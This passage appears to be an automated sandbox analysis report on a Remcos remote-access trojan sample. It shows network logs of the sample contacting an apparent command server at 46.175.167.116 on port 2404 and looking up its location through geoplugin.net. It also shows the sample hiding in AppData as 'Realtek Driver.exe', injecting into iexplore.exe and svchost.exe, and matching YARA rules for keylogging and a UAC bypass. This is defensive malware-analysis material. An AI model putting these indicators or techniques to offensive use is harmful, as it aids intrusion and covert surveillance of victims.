                                                Jan 3, 2025 13:33:58.770633936 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:33:58.775414944 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:33:59.491909981 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:33:59.542694092 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:33:59.674853086 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:33:59.678761005 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:33:59.683547974 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:33:59.685513973 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:33:59.690350056 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:33:59.690399885 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:33:59.695250988 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:00.098983049 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:00.152050972 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:34:00.179760933 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:34:00.343362093 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:00.343566895 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:00.386455059 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:34:00.516645908 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:00.516814947 CET4970680192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:00.521454096 CET8049705178.237.33.50192.168.2.5
                                                Jan 3, 2025 13:34:00.521538973 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:00.521615028 CET8049706178.237.33.50192.168.2.5
                                                Jan 3, 2025 13:34:00.521671057 CET4970680192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:00.521821022 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:00.526540041 CET8049705178.237.33.50192.168.2.5
                                                Jan 3, 2025 13:34:01.143383026 CET8049705178.237.33.50192.168.2.5
                                                Jan 3, 2025 13:34:01.143455982 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:01.196507931 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:34:01.201433897 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:02.143217087 CET8049705178.237.33.50192.168.2.5
                                                Jan 3, 2025 13:34:02.143285990 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:06.032206059 CET8049706178.237.33.50192.168.2.5
                                                Jan 3, 2025 13:34:06.032260895 CET4970680192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:06.032354116 CET8049706178.237.33.50192.168.2.5
                                                Jan 3, 2025 13:34:06.032407999 CET4970680192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:34:22.372636080 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:22.376133919 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:34:22.381032944 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:52.436779022 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:34:52.438070059 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:34:52.442887068 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:35:22.474709988 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:35:22.476095915 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:35:22.480926991 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:35:50.402417898 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:35:50.402470112 CET4970680192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:35:50.402507067 CET4970680192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:35:50.714611053 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:35:51.324107885 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:35:52.527143002 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:35:52.541862965 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:35:52.543697119 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:35:52.548496962 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:35:54.933358908 CET4970580192.168.2.5178.237.33.50
                                                Jan 3, 2025 13:35:59.745956898 CET4970580192.168.2.5178.237.33.50
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 3, 2025 13:34:00.423806906 CET5108753192.168.2.51.1.1.1
                                                Jan 3, 2025 13:34:00.431103945 CET53510871.1.1.1192.168.2.5
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 3, 2025 13:34:00.423806906 CET192.168.2.51.1.1.10xa6d9Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 3, 2025 13:34:00.431103945 CET1.1.1.1192.168.2.50xa6d9No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                • geoplugin.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549705178.237.33.50803716C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 3, 2025 13:34:00.521821022 CET71OUTGET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Jan 3, 2025 13:34:01.143383026 CET1171INHTTP/1.1 200 OK
                                                date: Fri, 03 Jan 2025 12:34:01 GMT
                                                server: Apache
                                                content-length: 963
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549706178.237.33.50803716C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 3, 2025 13:34:06.032206059 CET233INHTTP/1.1 408 Request Time-out
                                                content-length: 110
                                                cache-control: no-cache
                                                content-type: text/html
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:07:33:57
                                                Start date:03/01/2025
                                                Path:C:\Users\user\Desktop\1.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\1.exe"
                                                Imagebase:0x400000
                                                File size:494'592 bytes
                                                MD5 hash:38C479083BA7387EBAD73F3B67020EAB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2022398909.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:07:33:58
                                                Start date:03/01/2025
                                                Path:C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                                                Imagebase:0x400000
                                                File size:494'592 bytes
                                                MD5 hash:38C479083BA7387EBAD73F3B67020EAB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 87%, ReversingLabs
                                                • Detection: 79%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:07:33:58
                                                Start date:03/01/2025
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:"c:\program files (x86)\internet explorer\iexplore.exe"
                                                Imagebase:0x400000
                                                File size:828'368 bytes
                                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:4
                                                Start time:07:33:58
                                                Start date:03/01/2025
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:svchost.exe
                                                Imagebase:0xc10000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3265768781.0000000003400000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                Reputation:high
                                                Has exited:false

                                                Target ID:5
                                                Start time:07:34:07
                                                Start date:03/01/2025
                                                Path:C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                                                Imagebase:0x400000
                                                File size:494'592 bytes
                                                MD5 hash:38C479083BA7387EBAD73F3B67020EAB
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2114588212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                Target ID:7
                                                Start time:07:34:15
                                                Start date:03/01/2025
                                                Path:C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                                                Imagebase:0x400000
                                                File size:494'592 bytes
                                                MD5 hash:38C479083BA7387EBAD73F3B67020EAB
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2196581789.0000000000697000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                Target ID:8
                                                Start time:07:34:23
                                                Start date:03/01/2025
                                                Path:C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                                                Imagebase:0x400000
                                                File size:494'592 bytes
                                                MD5 hash:38C479083BA7387EBAD73F3B67020EAB
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
